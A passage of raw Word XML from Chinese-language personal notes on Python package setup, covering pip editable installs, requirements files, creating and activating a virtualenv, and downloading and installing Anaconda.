        <w:t xml:space="preserve"> setup.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件来确定要安装的软件包。这种方式适用于正在开发的项目，可以直接在本地进行修改和调试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77418F86" w14:textId="77777777" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B">
      <w:pPr>
        <w:ind w:firstLine="195"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A606F8A" w14:textId="50A3D487" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B">
      <w:pPr>
        <w:ind w:firstLine="195"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install -r requirements.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从一个指定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> requirements </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中安装依赖包。这个文件通常包含项目所需的所有依赖项及其版本信息，而不一定局限于当前项目。这种方式适用于将项目部署到其他环境中，如生产环境或测试环境，以确保环境中安装的软件包与开发环境中一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044BCC8" w14:textId="77777777" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B">
      <w:pPr>
        <w:ind w:firstLine="195"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716DB9B7" w14:textId="76757517" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过测试我发现，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -m pip install -e. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> set</w:t>
      </w:r>
      <w:r>
        <w:t>up.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">project.toml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中安装依赖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCBE93F" w14:textId="1FAAAAF8" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A2195F5" wp14:editId="3EBACF2C">
            <wp:extent cx="5274310" cy="2756535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1942918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1843" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2756535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58244A68" w14:textId="15C00FA6" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629D0C39" w14:textId="77777777" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B22C70" w14:textId="77777777" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2457C4D4" w14:textId="77777777" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EFB3607" w14:textId="65BEE607" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="401" w:name="_Toc159779852"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>virtualenv</w:t>
      </w:r>
      <w:r w:rsidR="00340024">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：包环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="401"/>
    </w:p>
    <w:p w14:paraId="16547865" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419B89F7" w14:textId="5799A69F" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很多开发环境、生产环境都会用这个来放置不同版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="006A7EC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要是解决</w:t>
      </w:r>
      <w:r w:rsidR="006A7EC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="006A7EC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的不同项目对依赖的需求不同的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0708A951" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="402" w:name="_Toc159779853"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="402"/>
    </w:p>
    <w:p w14:paraId="72544112" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mac OS X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下，下面两条命令可能会适用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255135AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ sudo easy_install virtualenv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3784AAC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77985CF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或更好的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B339DA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ sudo pip install virtualenv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763366AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF713B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上述的命令会在你的系统中安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> virtualenv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。它甚至可能会存在于包管理器中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你用的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以尝试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBBA8D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ sudo apt-get install python-virtualenv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4349591C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FEC5D90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="403" w:name="_Toc159779854"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>创建存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="403"/>
    </w:p>
    <w:p w14:paraId="59CE47B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">virtualenv </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装完毕后，你可以立即打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后创建你自己的环境。我通常创建一个项目文件夹，并在其下创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> venv </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A1E842" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33580F55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="002A759A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mkdir myprojec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5451042C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ cd myproject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4319F316" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="002A759A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>virtualenv venv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F6A6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>New python executable in venv/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2FD30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Installing distribute............done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E8049C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5505BD59" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="404" w:name="_Toc159779855"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>激活</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>venv</w:t>
      </w:r>
      <w:bookmarkEnd w:id="404"/>
    </w:p>
    <w:p w14:paraId="5D5075B4" w14:textId="577382B3" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0569E286" w14:textId="5F1AB985" w:rsidR="00E72CBC" w:rsidRDefault="00E72CBC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00115A6A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>source ./venv/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B99573A" w14:textId="595C6E53" w:rsidR="00C13E3A" w:rsidRDefault="00C13E3A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A013E45" w14:textId="15C3555E" w:rsidR="00115A6A" w:rsidRDefault="00115A6A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前面会出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>venv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F8DB42" w14:textId="448418EB" w:rsidR="004C452C" w:rsidRDefault="002B135A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="405" w:name="_Toc159779856"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭激活</w:t>
      </w:r>
      <w:bookmarkEnd w:id="405"/>
    </w:p>
    <w:p w14:paraId="1ABCC0D2" w14:textId="563DFCC6" w:rsidR="002B135A" w:rsidRDefault="002B135A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23171285" w14:textId="093C44E9" w:rsidR="002B135A" w:rsidRDefault="00792270" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接执行命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00792270">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00792270">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>eactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B87D38" w14:textId="376D2ECC" w:rsidR="002B135A" w:rsidRDefault="002B135A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A9234B" w14:textId="1ED3FF84" w:rsidR="002B135A" w:rsidRDefault="008C269D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="406" w:name="_Toc159779857"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>anaconda</w:t>
      </w:r>
      <w:bookmarkEnd w:id="406"/>
    </w:p>
    <w:p w14:paraId="38F1D39E" w14:textId="77777777" w:rsidR="008C269D" w:rsidRDefault="008C269D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E99931C" w14:textId="473A9FD8" w:rsidR="004B6CBF" w:rsidRDefault="004B6CBF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="407" w:name="_Toc159779858"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:bookmarkEnd w:id="407"/>
    </w:p>
    <w:p w14:paraId="3ADC7C43" w14:textId="42FAAA4B" w:rsidR="004B6CBF" w:rsidRDefault="004B6CBF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方下载地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244D7AD5" w14:textId="7E52C6EE" w:rsidR="004B6CBF" w:rsidRDefault="004B6CBF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004B6CBF">
        <w:t>https://repo.anaconda.com/archive/Anaconda3-2023.09-0-Windows-x86_64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5849FEDA" w14:textId="77777777" w:rsidR="004B6CBF" w:rsidRDefault="004B6CBF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C0075C" w14:textId="4CD9B73F" w:rsidR="004B6CBF" w:rsidRDefault="004B6CBF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清华源下载地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E69B314" w14:textId="749CFB72" w:rsidR="008C269D" w:rsidRDefault="004B6CBF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004B6CBF">
        <w:t>https://mirrors.tuna.tsinghua.edu.cn/anaconda/archive/Anaconda3-2023.09-0-Windows-x86_64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B733F70" w14:textId="77777777" w:rsidR="008C269D" w:rsidRDefault="008C269D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E7F67E7" w14:textId="3AF86219" w:rsidR="004B6CBF" w:rsidRDefault="004B6CBF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="408" w:name="_Toc159779859"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="408"/>
    </w:p>
    <w:p w14:paraId="5908FACF" w14:textId="77777777" w:rsidR="004B6CBF" w:rsidRDefault="004B6CBF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB6C9D1" w14:textId="28B2429D" w:rsidR="004B6CBF" w:rsidRPr="004B6CBF" w:rsidRDefault="00864546" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装路径不要有中文字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0192393D" w14:textId="0A36349A" w:rsidR="004B6CBF" w:rsidRDefault="00864546" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须把系统、用户的环境变量的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关先去除，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才能顺利安装，否则最后一步会卡好几分钟而安装失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66582118" w14:textId="77777777" w:rsidR="004B6CBF" w:rsidRDefault="004B6CBF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B5ABFE" w14:textId="482086B9" w:rsidR="0058734F" w:rsidRDefault="0058734F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原先环境变量（已加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11904439" w14:textId="32EB324F" w:rsidR="0058734F" w:rsidRDefault="0058734F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058734F">
